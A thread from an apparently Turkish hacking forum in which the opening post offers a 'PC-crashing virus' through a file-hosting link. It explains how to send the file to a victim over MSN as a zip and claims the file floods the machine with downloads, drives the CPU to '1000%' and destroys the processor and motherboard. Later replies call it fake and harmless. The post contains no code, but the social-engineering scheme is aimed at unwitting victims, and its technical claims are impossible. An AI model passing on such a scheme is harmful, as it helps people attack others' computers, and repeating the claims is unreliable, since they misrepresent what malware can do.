Pc çökertin

cartman

Katılımcı Üye
28 Ara 2005
932
17
zBjk
Bu virüs ne işe yarıyor derseniz; bu virüs msn de karsı tarafa zipli dosya olarak gönderiyoruz kurban bu dosyayı açınca milyonlarca internetten virüs dosyası indiriyor ve bunu kapatmaya imkan yok ctrl+alt+delete yapsanız bile kar etmiyor,ctrl+alt+delete yapıp performansı açıp bi bakın işlemci performansı %1000 lere çıkıyor bu virüsün amacı açtıgınız bilgisayarda 10 dk. dan fazla bekleyın ve bilgisayarı kapatın ve tekrar açın açılmayacak
kullanması çok basit zipli dosyayı klasöre çıkartıyorsunuz ve klasörü açıyorsunuz Untitled-1 bu programa fare (mause) çift tıklıyorsunuz ama sizin tıklamamanız daha iyi olur.çünkü tıkladıgınız an milyonlarca internetten virüs dosyası açıyor.makinenizin özellikleri düşükse pc 8 dk. içinde kapanıyor ve bidaha açılmıyor.bunun sebebide işlemci yanıyor anakarta da zarar veriyor.
http://rapidshare.de/files/11577198/virues.zip.html

muratakin200

Yeni üye
4 Eki 2006
4
0
Arkadaşım bizzat test ettim daha önceden pc falan çökmüyo antivirüs sil deo sil yapıyom sonra pc ye bi reset pc sapasağlam

sLayEr

Özel Üye
2 Ara 2006
781
5
İstanbul
aZ Önce bu KOnuNun ayNından 2 tane daha gördüm..buda 3. OLuor:)..isterseniz bir konu acmadan önce baska biri tarafından acıLıp acıLmadıgını bir kontrOL edin..

DecO

Yeni üye
16 Eyl 2006
7
0
bu forumun her tarafindan boyle bayat ve guvenli olmayan bilgiler akiyor. yazanlara kizamiyorum* cogu amator zaten* kendilerini ispatlamaya calisiyorlar. ama yoneticiler de kesin uyuyor* ki boyle yanlis bilgilere mudahale etmedikleri icin burayi bir MEZBAHA'ya ceviriyorlar. Harbiden yoneticiler* baska siteleri hacklemek disinda bu forum icin ne yapiyorlar??? deneyin* tavsiye edilen tum programlari indirin* harbiden hapi yutarsiniz* saka degil!! peki guvenilmeyecek bir ortama izin veren yoneticilerimizin hic mi sorumlulugu yok bunda?? ben burada olumlu bir elestiri yapiyor ve yeni gelen her mesajin denetlenmesi gerektigini soyluyorum* bu isi ogrenmeye hevesli olan arkadaslarin kurban olmasi ve/veya buna izin verilmesi hic bir etikle bagdasmaz* bagdasamaz. Hackerlik dolandiricilik sanati degildir!!!!

harikeyn

Yeni üye
10 May 2010
41
0
bazıları sahteden tşk ediyo insan programı dener sonra tşk edr...bizzat denedim ole bişey yok kardeşim saçma sapan milletin kafasınıda karıştırma

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.